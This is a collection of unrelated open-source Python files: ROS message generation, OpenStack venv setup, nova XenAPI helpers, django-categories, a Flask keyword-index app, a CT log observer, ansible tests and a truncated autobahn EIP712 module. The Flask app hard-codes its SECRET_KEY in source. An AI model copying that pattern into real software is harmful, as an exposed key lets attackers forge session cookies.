    msg_context = genmsg.msg_loader.MsgContext.create_default()
    full_type_name = genmsg.gentools.compute_full_type_name(package_name, os.path.basename(input_file))
    spec = genmsg.msg_loader.load_srv_from_file(msg_context, input_file, full_type_name)
    # Load the dependencies
    genmsg.msg_loader.load_depends(msg_context, spec, search_path)
    # Generate the language dependent srv file
    _generate_from_spec(input_file,
                        output_dir,
                        template_dir,
                        msg_context,
                        spec,
                        srv_template_dict,
                        search_path)
    # Generate the language dependent msg file for the srv request
    _generate_from_spec(input_file,
                        output_dir,
                        template_dir,
                        msg_context,
                        spec.request,
                        msg_template_dict,
                        search_path)
    # Generate the language dependent msg file for the srv response
    _generate_from_spec(input_file,
                        output_dir,
                        template_dir,
                        msg_context,
                        spec.response,
                        msg_template_dict,
                        search_path)
# uniform interface for genering either srv or msg files
def generate_from_file(input_file, package_name, output_dir, template_dir, include_path, msg_template_dict, srv_template_dict):
    """Generate language-specific files for one .msg or .srv input file.

    Dispatches on the input file's extension; raises AssertionError for any
    other extension (kept as assert to preserve the exception type).
    """
    # Normalize paths
    input_file = os.path.abspath(input_file)
    output_dir = os.path.abspath(output_dir)
    # Create output dir
    try:
        os.makedirs(output_dir)
    except OSError as e:
        if e.errno != 17:  # 17 == EEXIST: directory already exists is fine
            raise
    # Parse include path dictionary
    if include_path:
        search_path = genmsg.command_line.includepath_to_dict(include_path)
    else:
        search_path = {}
    # Generate the file(s)
    if input_file.endswith(".msg"):
        _generate_msg_from_file(input_file, output_dir, template_dir, search_path, package_name, msg_template_dict)
    elif input_file.endswith(".srv"):
        _generate_srv_from_file(input_file, output_dir, template_dir, search_path, package_name, srv_template_dict, msg_template_dict)
    else:
        # Fix: corrected typo "Uknown" -> "Unknown" in the failure message.
        assert False, "Unknown file extension for %s" % input_file
def generate_module(package_name, output_dir, template_dir, template_dict):
    """Expand module-level templates (e.g. a package __init__) over the set
    of files already generated into output_dir."""
    # Locate generate msg files
    files = os.listdir(output_dir)
    # Loop over all files to generate
    for template_file_name, output_file_name in template_dict.items():
        template_file = os.path.join(template_dir, template_file_name)
        output_file = os.path.join(output_dir, output_file_name)
        ofile = open(output_file, 'w') #todo try
        # Set dictionary for the generator intepreter
        g = dict(files=files,
                 package=package_name)
        # todo, reuse interpreter
        # NOTE(review): unlike _generate_from_spec, globals are passed via
        # updateGlobals() instead of the constructor — confirm both are
        # equivalent for em.Interpreter.
        interpreter = em.Interpreter(output=ofile, options={em.RAW_OPT:True,em.BUFFERED_OPT:True})
        interpreter.updateGlobals(g)
        # Template missing: clean up the half-created output before raising.
        if not os.path.isfile(template_file):
            ofile.close()
            os.remove(output_file)
            raise RuntimeError("Template file %s not found in template dir %s" % (template_file_name, template_dir))
        interpreter.file(open(template_file)) #todo try
        interpreter.shutdown()
# Uniform interface to support the standard command line options
def generate_from_command_line_options(argv, msg_template_dict, srv_template_dict, module_template_dict={}):
    """Parse the standard generator command line and run generation.

    NOTE: the mutable default for module_template_dict is safe here because
    it is only ever read, never mutated.
    """
    from optparse import OptionParser
    parser = OptionParser("[options] <srv file>")
    parser.add_option("-p", dest='package',
                      help="ros package the generated msg/srv files belongs to")
    parser.add_option("-o", dest='outdir',
                      help="directory in which to place output files")
    parser.add_option("-I", dest='includepath',
                      help="include path to search for messages",
                      action="append")
    parser.add_option("-m", dest='module',
                      help="write the module file",
                      action='store_true', default=False)
    parser.add_option("-e", dest='emdir',
                      help="directory containing template files",
                      default=sys.path[0])
    (options, argv) = parser.parse_args(argv)

    if not options.package or not options.outdir or not options.emdir:
        parser.print_help()
        # Fix: sys.exit() instead of the site-provided exit() builtin, which
        # is meant for interactive use and absent under `python -S`.
        sys.exit(-1)

    if options.module:
        generate_module(options.package, options.outdir, options.emdir, module_template_dict)
    else:
        if len(argv) > 1:
            generate_from_file(argv[1], options.package, options.outdir, options.emdir, options.includepath, msg_template_dict, srv_template_dict)
        else:
            parser.print_help()
            sys.exit(-1)
| gpl-3.0 |
NeCTAR-RC/designate | tools/install_venv_common.py | 10 | 7888 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 OpenStack Foundation
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Provides methods needed by installation script for OpenStack development
virtual environments.
Since this script is used to bootstrap a virtualenv from the system's Python
environment, it should be kept strictly compatible with Python 2.6.
Synced in from openstack-common
"""
from __future__ import print_function
import optparse
import os
import subprocess
import sys
class InstallVenv(object):
    """Creates and populates a project virtualenv.

    Drives virtualenv creation, pip bootstrap, and dependency installation;
    distribution-specific quirks are delegated to the object returned by
    get_distro().
    """

    def __init__(self, root, venv, pip_requires, test_requires, py_version,
                 project):
        self.root = root
        self.venv = venv
        self.pip_requires = pip_requires
        self.test_requires = test_requires
        self.py_version = py_version
        self.project = project

    def die(self, message, *args):
        # Print to stderr and abort the whole script.
        print(message % args, file=sys.stderr)
        sys.exit(1)

    def check_python_version(self):
        if sys.version_info < (2, 6):
            self.die("Need Python Version >= 2.6")

    def run_command_with_code(self, cmd, redirect_output=True,
                              check_exit_code=True):
        """Runs a command in an out-of-process shell.

        Returns the output of that command. Working directory is self.root.
        Result is a (stdout-or-None, returncode) tuple.
        """
        if redirect_output:
            stdout = subprocess.PIPE
        else:
            stdout = None

        proc = subprocess.Popen(cmd, cwd=self.root, stdout=stdout)
        output = proc.communicate()[0]
        if check_exit_code and proc.returncode != 0:
            self.die('Command "%s" failed.\n%s', ' '.join(cmd), output)
        return (output, proc.returncode)

    def run_command(self, cmd, redirect_output=True, check_exit_code=True):
        # Convenience wrapper that discards the exit code.
        return self.run_command_with_code(cmd, redirect_output,
                                          check_exit_code)[0]

    def get_distro(self):
        # Fedora/RHEL/CentOS are detected via their release marker files;
        # anything else falls back to the generic Distro behaviour.
        if (os.path.exists('/etc/fedora-release') or
                os.path.exists('/etc/redhat-release')):
            return Fedora(self.root, self.venv, self.pip_requires,
                          self.test_requires, self.py_version, self.project)
        else:
            return Distro(self.root, self.venv, self.pip_requires,
                          self.test_requires, self.py_version, self.project)

    def check_dependencies(self):
        self.get_distro().install_virtualenv()

    def create_virtualenv(self, no_site_packages=True):
        """Creates the virtual environment and installs PIP.

        Creates the virtual environment and installs PIP only into the
        virtual environment.
        """
        if not os.path.isdir(self.venv):
            print('Creating venv...', end=' ')
            if no_site_packages:
                self.run_command(['virtualenv', '-q', '--no-site-packages',
                                  self.venv])
            else:
                self.run_command(['virtualenv', '-q', self.venv])
            print('done.')
            print('Installing pip in venv...', end=' ')
            # easy_install prints nothing on failure, hence the .strip() test.
            if not self.run_command(['tools/with_venv.sh', 'easy_install',
                                     'pip>1.0']).strip():
                self.die("Failed to install pip.")
            print('done.')
        else:
            print("venv already exists...")
            pass

    def pip_install(self, *args):
        self.run_command(['tools/with_venv.sh',
                          'pip', 'install', '--upgrade'] + list(args),
                         redirect_output=False)

    def install_dependencies(self):
        print('Installing dependencies with pip (this can take a while)...')

        # First things first, make sure our venv has the latest pip and
        # distribute.
        # NOTE: we keep pip at version 1.1 since the most recent version causes
        # the .venv creation to fail. See:
        # https://bugs.launchpad.net/nova/+bug/1047120
        self.pip_install('pip==1.1')
        self.pip_install('distribute')

        # Install greenlet by hand - just listing it in the requires file does
        # not
        # get it installed in the right order
        self.pip_install('greenlet')

        self.pip_install('-r', self.pip_requires)
        self.pip_install('-r', self.test_requires)

    def post_process(self):
        self.get_distro().post_process()

    def parse_args(self, argv):
        """Parses command-line arguments."""
        parser = optparse.OptionParser()
        parser.add_option('-n', '--no-site-packages',
                          action='store_true',
                          help="Do not inherit packages from global Python "
                               "install")
        return parser.parse_args(argv[1:])[0]
class Distro(InstallVenv):
    """Generic distribution: installs virtualenv via easy_install if absent."""

    def check_cmd(self, cmd):
        # True when `cmd` is found on PATH (non-empty `which` output).
        return bool(self.run_command(['which', cmd],
                                     check_exit_code=False).strip())

    def install_virtualenv(self):
        if self.check_cmd('virtualenv'):
            return

        if self.check_cmd('easy_install'):
            print('Installing virtualenv via easy_install...', end=' ')
            if self.run_command(['easy_install', 'virtualenv']):
                print('Succeeded')
                return
            else:
                print('Failed')

        self.die('ERROR: virtualenv not found.\n\n%s development'
                 ' requires virtualenv, please install it using your'
                 ' favorite package management tool' % self.project)

    def post_process(self):
        """Any distribution-specific post-processing gets done here.

        In particular, this is useful for applying patches to code inside
        the venv.
        """
        pass
class Fedora(Distro):
    """This covers all Fedora-based distributions.

    Includes: Fedora, RHEL, CentOS, Scientific Linux
    """

    def check_pkg(self, pkg):
        # True when the RPM package is installed (rpm -q exits 0).
        return self.run_command_with_code(['rpm', '-q', pkg],
                                          check_exit_code=False)[1] == 0

    def apply_patch(self, originalfile, patchfile):
        # -N skips already-applied patches; the exit code is deliberately
        # ignored so re-running is harmless.
        self.run_command(['patch', '-N', originalfile, patchfile],
                         check_exit_code=False)

    def install_virtualenv(self):
        if self.check_cmd('virtualenv'):
            return

        if not self.check_pkg('python-virtualenv'):
            self.die("Please install 'python-virtualenv'.")

        super(Fedora, self).install_virtualenv()

    def post_process(self):
        """Workaround for a bug in eventlet.

        This currently affects RHEL6.1, but the fix can safely be
        applied to all RHEL and Fedora distributions.
        This can be removed when the fix is applied upstream.

        Nova: https://bugs.launchpad.net/nova/+bug/884915
        Upstream: https://bitbucket.org/eventlet/eventlet/issue/89
        RHEL: https://bugzilla.redhat.com/958868
        """

        # Install "patch" program if it's not there
        if not self.check_pkg('patch'):
            self.die("Please install 'patch'.")

        # Apply the eventlet patch
        self.apply_patch(os.path.join(self.venv, 'lib', self.py_version,
                                      'site-packages',
                                      'eventlet/green/subprocess.py'),
                         'contrib/redhat-eventlet.patch')
| apache-2.0 |
fajoy/nova | nova/virt/xenapi/network_utils.py | 25 | 1869 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2010 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Helper methods for operations related to the management of network
records and their attributes like bridges, PIFs, QoS, as well as
their lookup functions.
"""
def find_network_with_name_label(session, name_label):
    """Return the single network ref with this name label, or None.

    Raises if more than one network carries the label.
    """
    matches = session.call_xenapi('network.get_by_name_label', name_label)
    if not matches:
        return None
    if len(matches) > 1:
        raise Exception(_('Found non-unique network for name_label %s') %
                        name_label)
    return matches[0]
def find_network_with_bridge(session, bridge):
    """
    Return the network on which the bridge is attached, if found.
    The bridge is defined in the nova db and can be found either in the
    'bridge' or 'name_label' fields of the XenAPI network record.
    """
    expr = ('field "name__label" = "%s" or field "bridge" = "%s"' %
            (bridge, bridge))
    networks = session.call_xenapi('network.get_all_records_where', expr)
    if len(networks) == 1:
        # Fix: list(networks)[0] instead of networks.keys()[0] — dict key
        # views are not indexable on Python 3; behaviour on Python 2 is
        # unchanged.
        return list(networks)[0]
    elif len(networks) > 1:
        raise Exception(_('Found non-unique network for bridge %s') % bridge)
    else:
        raise Exception(_('Found no network for bridge %s') % bridge)
| apache-2.0 |
Govexec/django-categories | categories/base.py | 1 | 7455 | """
This is the base class on which to build a hierarchical category-like model
with customizable metadata and its own name space.
"""
from django import forms
from django.contrib import admin
from django.contrib.sites.models import Site
from django.db import models
from django.template.defaultfilters import slugify
from django.utils.encoding import force_unicode
from django.utils.translation import ugettext_lazy as _
from mptt.models import MPTTModel
from mptt.fields import TreeForeignKey
from mptt.managers import TreeManager
from categories.editor.tree_editor import TreeEditor
from categories.querysets import CategoryQuerySet
from categories.settings import ALLOW_SLUG_CHANGE, SLUG_TRANSLITERATOR
class CategoryManager(models.Manager):
    """Manager returning CategoryQuerySet so category filters can chain."""

    def get_query_set(self):
        return CategoryQuerySet(self.model)

    def active(self):
        """
        Only categories that are active
        """
        return self.get_query_set().active()

    def govexec(self):
        # Project-specific filter; semantics live in CategoryQuerySet.govexec.
        return self.get_query_set().govexec()
class CategoryBase(MPTTModel):
    """
    This base model includes the absolute bare bones fields and methods. One
    could simply subclass this model and do nothing else and it should work.
    """
    parent = TreeForeignKey('self',
                            blank=True,
                            null=True,
                            related_name='children',
                            verbose_name=_('parent'))
    name = models.CharField(max_length=100, verbose_name=_('name'))
    slug = models.SlugField(verbose_name=_('slug'))
    active = models.BooleanField(default=True, verbose_name=_('active'))
    # Optional pre-computed display name; falls back to
    # generate_unicode_name() when empty (see __unicode__).
    unicode_name = models.CharField(
        blank=True,
        null=True,
        default=None,
        max_length=255)

    # TODO: I would like to make this required if we can eliminate edge cases
    site = models.ForeignKey(Site, blank=True, null=True)

    objects = CategoryManager()
    tree = TreeManager()

    def save(self, *args, **kwargs):
        """
        While you can activate an item without activating its descendants,
        It doesn't make sense that you can deactivate an item and have its
        decendants remain active.
        """
        if not self.slug:
            self.slug = slugify(SLUG_TRANSLITERATOR(self.name))[:50]

        super(CategoryBase, self).save(*args, **kwargs)

        if not self.active:
            # Cascade deactivation to every descendant that is still active.
            for item in self.get_descendants():
                if item.active != self.active:
                    item.active = self.active
                    item.save()

    def __unicode__(self):
        if hasattr(self, 'unicode_name') and self.unicode_name:
            return self.unicode_name
        return self.generate_unicode_name()

    def generate_unicode_name(self):
        # Builds an "Ancestor > ... > Name" breadcrumb.
        ancestors = self.get_ancestors()
        # remove top-level category from display
        ancestors_list = list(ancestors)
        # added hack to show "magazine" in the section title
        if len(ancestors_list) > 0 and not ancestors_list[0].slug == "magazine" and not ancestors_list[0].slug == "nextgov-categories":
            del ancestors_list[0]
        # NOTE(review): the join below uses the *unfiltered* `ancestors`, not
        # `ancestors_list`, so the `del` above has no effect on the output —
        # confirm whether that is intended.
        return ' > '.join([force_unicode(i.name) for i in ancestors] + [self.name, ])

    def all_categories(self, delimiter='::'):
        # NOTE(review): hasattr checks '__all_categories' but the attribute
        # is name-mangled to '_CategoryBase__all_categories', so this cache
        # check never hits; also each iteration re-joins already-joined
        # strings — confirm the intended output format.
        if hasattr(self, '__all_categories'):
            return self.__all_categories
        self.__all_categories = []
        for category in self.get_ancestors(include_self=True):
            tmp = []
            for existing in self.__all_categories:
                tmp.append(existing)
            tmp.append(category.name)
            self.__all_categories.append(delimiter.join(tmp))
        return self.__all_categories

    class Meta:
        abstract = True
        unique_together = (('parent', 'name'), ('tree_id', 'slug'),)
        ordering = ('tree_id', 'lft')

    class MPTTMeta:
        order_insertion_by = 'name'
class CategoryBaseAdminForm(forms.ModelForm):
    """Admin form enforcing per-tree slug uniqueness and a valid parent."""

    def clean_slug(self):
        # Regenerate the slug from the name unless manual slug edits are
        # allowed for an existing instance; always cap at the 50-char field.
        if self.instance is None or not ALLOW_SLUG_CHANGE:
            self.cleaned_data['slug'] = slugify(self.cleaned_data['name'])
        return self.cleaned_data['slug'][:50]

    def clean(self):
        super(CategoryBaseAdminForm, self).clean()

        if not self.is_valid():
            return self.cleaned_data

        opts = self._meta

        # Validate slug (no duplicate slugs within same tree_id)
        kwargs = {}
        this_tree_slugs = []
        if self.cleaned_data.get('parent', None) is None:
            # This is a top level category, so its tree_id cannot be checked
            pass
        else:
            # Retrieve all other slugs in the same tree (using the tree_id of the parent category)
            parent_tree_id = int(self.cleaned_data['parent'].tree_id)
            this_tree_slugs = [c['slug'] for c in opts.model.objects.filter(
                tree_id=parent_tree_id).values('id', 'slug'
                ) if c['id'] != self.instance.id]
        # Raise error if any other slugs in the same tree match the new category slug
        if self.cleaned_data['slug'] in this_tree_slugs:
            raise forms.ValidationError(_('The slug must be unique among '
                                          ' items in the same tree.'))

        # Validate Category Parent
        # Make sure the category doesn't set itself or any of its children as
        # its parent.
        decendant_ids = self.instance.get_descendants().values_list('id', flat=True)
        if self.cleaned_data.get('parent', None) is None or self.instance.id is None:
            return self.cleaned_data
        elif self.cleaned_data['parent'].id == self.instance.id:
            raise forms.ValidationError(_("You can't set the parent of the "
                                          "item to itself."))
        elif self.cleaned_data['parent'].id in decendant_ids:
            raise forms.ValidationError(_("You can't set the parent of the "
                                          "item to a descendant."))
        return self.cleaned_data
class CategoryBaseAdmin(TreeEditor, admin.ModelAdmin):
    """Tree-aware admin with cascading bulk activate/deactivate actions."""
    form = CategoryBaseAdminForm
    list_display = ('name', 'active')
    search_fields = ('name',)
    prepopulated_fields = {'slug': ('name',)}

    actions = ['activate', 'deactivate']

    def get_actions(self, request):
        actions = super(CategoryBaseAdmin, self).get_actions(request)
        # Remove Django's bulk delete so editors must use the cascading
        # deactivate action instead.
        if 'delete_selected' in actions:
            del actions['delete_selected']
        return actions

    def deactivate(self, request, queryset):
        """
        Set active to False for selected items
        """
        # NOTE(review): re-derives the selection from request.POST instead of
        # using the queryset argument — confirm this is deliberate.
        selected_cats = self.model.objects.filter(
            pk__in=[int(x) for x in request.POST.getlist('_selected_action')])

        for item in selected_cats:
            if item.active:
                item.active = False
                item.save()
                item.children.all().update(active=False)
    deactivate.short_description = _('Deactivate selected categories and their children')

    def activate(self, request, queryset):
        """
        Set active to True for selected items
        """
        selected_cats = self.model.objects.filter(
            pk__in=[int(x) for x in request.POST.getlist('_selected_action')])

        for item in selected_cats:
            item.active = True
            item.save()
            item.children.all().update(active=True)
    activate.short_description = _('Activate selected categories and their children')
| apache-2.0 |
nkcr/WebIndex | app/webstart.py | 1 | 3546 | '''This module provides a minimalist interface using Flask webserver.
Author: Noémien Kocher
Licence: MIT
Date: july 2016
'''
from flask import Flask, render_template, flash, request, redirect, url_for
from werkzeug.utils import secure_filename
import os, shutil
import webindex as wi
app = Flask(__name__)
UPLOAD_FOLDER = 'static/uploads' # default uplad folder
ALLOWED_EXTENSIONS = set(['html']) # file extension allowed
MAX_HIST = 100 # default number of keywords to display
# Set Flask variables
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
app.config['SECRET_KEY'] = 'dyf45hmlg350xykfh590ahfgsnek692d'
app.config['DEFAULT_QUANTITY'] = 100
def display_filter(s):
    '''Jinja filter: round a score to two decimals, capped at MAX_HIST.

    Fix: the original computed round(s, 2) twice; compute it once and
    return the cached value.
    '''
    res = round(s, 2)
    if res > MAX_HIST:
        return MAX_HIST
    return res
# Registered under the template name "hist" for the histogram bars.
app.jinja_env.filters['hist'] = display_filter
def cut_filter(s):
    '''This is a jinja filter. It removes extra digits on a float
    '''
    return round(s,2)
# Registered under the template name "cut".
app.jinja_env.filters['cut'] = cut_filter
def allowed_file(filename):
    '''Check if a filename has the good extension (ie .html)

    The extension is lower-cased before the lookup so "PAGE.HTML" is
    accepted too (ALLOWED_EXTENSIONS stores lower-case entries); this is a
    backward-compatible widening of the accepted set.
    '''
    return '.' in filename and \
        filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
def clean_folder(path):
    '''Removes the content of a folder.

    Only plain files are removed; subdirectories are left in place (the
    rmtree branch below is intentionally commented out).
    '''
    for the_file in os.listdir(path):
        file_path = os.path.join(path, the_file)
        try:
            if os.path.isfile(file_path):
                os.unlink(file_path)
            #elif os.path.isdir(file_path): shutil.rmtree(file_path)
        except Exception as e:
            # Best effort: report and keep deleting the remaining files.
            print(e)
@app.route('/', methods=['GET', 'POST'])
def index():
    '''This is our main and only entry. It can display keywords based
    on data found in 'data' folder or read html files from a folder and
    creating the datastructures that will be saved in 'data' folder.
    '''
    webindex = wi.Webindex()

    # Quantity param: how many top-ranked keywords to show.
    quantity = request.args.get("quantity")
    if(quantity is None):
        quantity = app.config['DEFAULT_QUANTITY']
    else:
        quantity = int(quantity)

    # bias param: optionally re-weight one keyword before display.
    if(request.args.get("word") is not None and
            request.args.get("bias") is not None):
        try:
            webindex.bias(request.args.get("word"), float(request.args.get("bias")))
        except BaseException as e:
            # NOTE(review): flash()'s second argument is the message
            # *category*; str(e) ends up as a category rather than visible
            # text — confirm this is intended.
            flash("Failed to bias. ", str(e))

    if request.method == 'POST':
        # check if the post request has the file part
        if 'file' not in request.files:
            flash('No file part')
            return redirect(request.url)
        files = request.files.getlist("file")
        # if user does not select file, browser also
        # submit a empty part without filename
        if not files:
            flash('No selected files')
            return redirect(request.url)
        # Start from a clean upload folder before processing the new batch.
        clean_folder(app.config['UPLOAD_FOLDER'])
        for file in files:
            if file and allowed_file(file.filename):
                filename = secure_filename(file.filename)
                filepath = os.path.join(app.config['UPLOAD_FOLDER'], filename)
                file.save(filepath)
                webindex.handlefile(filepath)
            else:
                flash('Found unallowed file extension: ' + file.filename)
        best = webindex.mostranked(quantity)
        # Persist the inverted index and repository for later GET requests.
        webindex.saveii()
        webindex.saverepo()
    else:
        # GET: serve precomputed rankings from the saved data.
        best = webindex.read_mostranked(quantity)

    words = webindex.get_words()
    return render_template('index.html', best=best, words=words)
| mit |
AlCutter/certificate-transparency | python/utilities/logobserver/logobserver.py | 7 | 2496 | #!/usr/bin/env python
import gflags
from google.protobuf import text_format
import logging
import os
import sys
import requests
from ct.client.db import sqlite_connection as sqlitecon
from ct.client import prober
from ct.client.db import sqlite_log_db
from ct.client.db import sqlite_temp_db
from ct.client.db import sqlite_cert_db
from ct.proto import client_pb2
FLAGS = gflags.FLAGS
gflags.DEFINE_string("ctlog_config", "ct/config/logs.config",
"Configuration file for log servers to monitor")
gflags.DEFINE_string("log_level", "WARNING", "logging level")
gflags.DEFINE_string("ct_sqlite_db", "/tmp/ct", "Location of the CT database")
gflags.DEFINE_string("ct_sqlite_temp_dir", "/tmp/ct_tmp", "Directory for "
"temporary CT data.")
gflags.DEFINE_string("ct_sqlite_cert_db", "/tmp/ct_cert", "Location of "
"certificate database.")
gflags.DEFINE_string("monitor_state_dir", "/tmp/ct_monitor",
"Filename prefix for monitor state. State for a given log "
"will be stored in a monitor_state_dir/log_id file")
def create_directory(directory):
if not os.path.exists(directory):
logging.info("Creating directory: %s" % directory)
os.makedirs(directory)
if __name__ == '__main__':
sys.argv = FLAGS(sys.argv)
logging.basicConfig(level=FLAGS.log_level)
create_directory(FLAGS.ct_sqlite_temp_dir)
create_directory(FLAGS.monitor_state_dir)
sqlite_log_db = sqlite_log_db.SQLiteLogDB(
sqlitecon.SQLiteConnectionManager(FLAGS.ct_sqlite_db))
sqlite_temp_db_factory = sqlite_temp_db.SQLiteTempDBFactory(
sqlitecon.SQLiteConnectionManager(FLAGS.ct_sqlite_temp_dir + "/meta"),
FLAGS.ct_sqlite_temp_dir)
sqlite_cert_db = sqlite_cert_db.SQLiteCertDB(
sqlitecon.SQLiteConnectionManager(FLAGS.ct_sqlite_cert_db))
ctlogs = client_pb2.CtLogs()
with open(FLAGS.ctlog_config, "r") as config:
log_config = config.read()
text_format.Merge(log_config, ctlogs)
ct_server_list = []
for log in ctlogs.ctlog:
sqlite_log_db.update_log(log)
ct_server_list.append(log.log_server)
prober_thread = prober.ProberThread(ctlogs, sqlite_log_db,
sqlite_cert_db,
sqlite_temp_db_factory,
FLAGS.monitor_state_dir)
prober_thread.start()
| apache-2.0 |
thaumos/ansible | test/units/utils/test_context_objects.py | 29 | 3536 | # -*- coding: utf-8 -*-
# Copyright: (c) 2018, Toshio Kuratomi <tkuratomi@ansible.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division)
__metaclass__ = type
try:
import argparse
except ImportError:
argparse = None
import optparse
import pytest
from ansible.module_utils.common.collections import ImmutableDict
from ansible.utils import context_objects as co
# (input, expected) pairs for test_make_immutable: scalars pass through
# unchanged, dicts become ImmutableDict, lists become tuples, sets become
# frozensets, and nested containers are converted recursively.
MAKE_IMMUTABLE_DATA = ((u'くらとみ', u'くらとみ'),
                       (42, 42),
                       ({u'café': u'くらとみ'}, ImmutableDict({u'café': u'くらとみ'})),
                       ([1, u'café', u'くらとみ'], (1, u'café', u'くらとみ')),
                       (set((1, u'café', u'くらとみ')), frozenset((1, u'café', u'くらとみ'))),
                       ({u'café': [1, set(u'ñ')]},
                        ImmutableDict({u'café': (1, frozenset(u'ñ'))})),
                       ([set((1, 2)), {u'くらとみ': 3}],
                        (frozenset((1, 2)), ImmutableDict({u'くらとみ': 3}))),
                       )
@pytest.mark.parametrize('data, expected', MAKE_IMMUTABLE_DATA)
def test_make_immutable(data, expected):
    """_make_immutable must deep-freeze every mutable container."""
    frozen = co._make_immutable(data)
    assert frozen == expected
def test_cliargs_from_dict():
    """CLIArgs built from a plain dict freezes every value."""
    source = {'tags': [u'production', u'webservers'],
              'check_mode': True,
              'start_at_task': u'Start with くらとみ'}
    frozen_expected = frozenset((('tags', (u'production', u'webservers')),
                                 ('check_mode', True),
                                 ('start_at_task', u'Start with くらとみ')))
    assert frozenset(co.CLIArgs(source).items()) == frozen_expected
def test_cliargs():
    """CLIArgs.from_options reads attributes off an arbitrary options object."""
    class StubOptions:
        pass

    options = StubOptions()
    options.tags = [u'production', u'webservers']
    options.check_mode = True
    options.start_at_task = u'Start with くらとみ'

    expected = frozenset((('tags', (u'production', u'webservers')),
                          ('check_mode', True),
                          ('start_at_task', u'Start with くらとみ')))
    assert frozenset(co.CLIArgs.from_options(options).items()) == expected
# BUGFIX: the marker is `skipif` (lower-case) and takes a condition plus a
# required `reason`. `@pytest.mark.skipIf(...)` merely registered an unknown
# custom marker, so the test was never actually skipped when argparse was
# missing.
@pytest.mark.skipif(argparse is None, reason='argparse is not available')
def test_cliargs_argparse():
    """CLIArgs.from_options also accepts an argparse Namespace."""
    parser = argparse.ArgumentParser(description='Process some integers.')
    parser.add_argument('integers', metavar='N', type=int, nargs='+',
                        help='an integer for the accumulator')
    parser.add_argument('--sum', dest='accumulate', action='store_const',
                        const=sum, default=max,
                        help='sum the integers (default: find the max)')
    args = parser.parse_args([u'--sum', u'1', u'2'])
    expected = frozenset((('accumulate', sum), ('integers', (1, 2))))
    assert frozenset(co.CLIArgs.from_options(args).items()) == expected
# Can get rid of this test when we port ansible.cli from optparse to argparse
def test_cliargs_optparse():
    """CLIArgs.from_options also accepts optparse output."""
    parser = optparse.OptionParser(description='Process some integers.')
    parser.add_option('--sum', dest='accumulate', action='store_const',
                      const=sum, default=max,
                      help='sum the integers (default: find the max)')
    options, leftover = parser.parse_args([u'--sum', u'1', u'2'])
    options.integers = leftover
    expected = frozenset((('accumulate', sum), ('integers', (u'1', u'2'))))
    assert frozenset(co.CLIArgs.from_options(options).items()) == expected
| gpl-3.0 |
oberstet/autobahn-python | autobahn/xbr/_eip712_market_create.py | 3 | 5917 | ###############################################################################
#
# The MIT License (MIT)
#
# Copyright (c) Crossbar.io Technologies GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
from typing import Optional
from ._eip712_base import sign, recover, is_address, is_bytes16, is_block_number, \
is_chain_id, is_eth_privkey, is_signature
def _create_eip712_market_create(chainId: int, verifyingContract: bytes, member: bytes, created: int,
                                 marketId: bytes, coin: bytes, terms: str, meta: Optional[str], maker: bytes,
                                 providerSecurity: int, consumerSecurity: int, marketFee: int) -> dict:
    """
    Build the EIP712 typed-data structure for an XBR "market create" transaction.

    :param chainId: Chain ID (EIP155) the signature is valid for.
    :param verifyingContract: Address (20 bytes) of the verifying contract.
    :param member: Address (20 bytes) of the member creating the market.
    :param created: Block number at which the market is created.
    :param marketId: New market ID (16 bytes).
    :param coin: Address (20 bytes) of the coin used for payment in the market.
    :param terms: Market terms (string, eg a multihash).
    :param meta: Optional market metadata; serialized as '' when None.
    :param maker: Address (20 bytes) of the market maker delegate.
    :param providerSecurity: Provider security amount. Validated here, but
        NOT currently part of the signed message (see FIXME below).
    :param consumerSecurity: Consumer security amount. Validated here, but
        NOT currently part of the signed message (see FIXME below).
    :param marketFee: Market fee amount.
    :return: EIP712 typed data dict, ready to be signed or recovered.
    """
    assert is_chain_id(chainId)
    assert is_address(verifyingContract)
    assert is_address(member)
    assert is_block_number(created)
    assert is_bytes16(marketId)
    assert is_address(coin)
    # isinstance instead of exact type comparison (PEP 8): also accepts
    # str subclasses, with otherwise identical validation behavior.
    assert isinstance(terms, str)
    assert meta is None or isinstance(meta, str)
    assert is_address(maker)
    assert isinstance(providerSecurity, int)
    assert isinstance(consumerSecurity, int)
    assert isinstance(marketFee, int)

    # FIXME: add "coin" in below once we have done that in XBRTypes
    data = {
        'types': {
            'EIP712Domain': [
                {
                    'name': 'name',
                    'type': 'string'
                },
                {
                    'name': 'version',
                    'type': 'string'
